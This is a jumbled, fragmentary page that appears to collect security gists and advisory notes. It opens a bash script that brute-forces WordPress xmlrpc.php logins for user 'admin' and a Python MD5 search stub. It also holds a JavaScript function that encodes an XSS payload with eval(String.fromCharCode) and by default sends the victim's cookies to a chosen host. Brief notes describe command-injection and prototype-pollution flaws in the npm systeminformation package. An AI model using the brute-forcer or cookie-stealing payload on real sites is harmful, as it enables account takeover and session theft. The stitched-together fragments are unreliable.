References:
Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10
#!/bin/bash | |
if [[ $1 == '' || $2 == '' ]] | |
then | |
echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>" | |
exit | |
fi | |
USER="admin" |
# -*- coding: utf-8 -*- | |
import multiprocessing | |
import hashlib | |
import random | |
import string | |
import sys | |
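# Candidate alphabet for the search: ASCII letters plus digits.
# `string.ascii_letters` (not the Python 2-only, locale-dependent
# `string.letters`) exists on both Python 2 and 3, so the module imports
# under either interpreter.
CHARS = string.ascii_letters + string.digits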
def cmp_md5(substr, stop_event, str_len, start=0, size=20): | |
global CHARS | |
while not stop_event.is_set(): |
function generate(host, com) { | |
const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com; | |
let encoded = command[0].charCodeAt(); | |
for (var i = 1; i < command.length; i++) { | |
encoded += ',' + command[i].charCodeAt(); | |
} | |
encoded = `eval(String.fromCharCode(${encoded}))`; | |
console.log(encoded); | |
return encoded; |
References:
Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10
Package name: systeminformation.
Tested package versions: 4.30.1, 4.30.2, 4.30.4
Fixed package versions: >= 4.30.5
Description: An attacker can overwrite an object's properties and functions, which can lead to the execution of OS commands.
Package name: systeminformation.
Tested package versions: 4.31.0.
Fixed package versions: >= 4.31.1.
Description: An attacker can inject an OS command inside quotation marks, and it will be executed.
...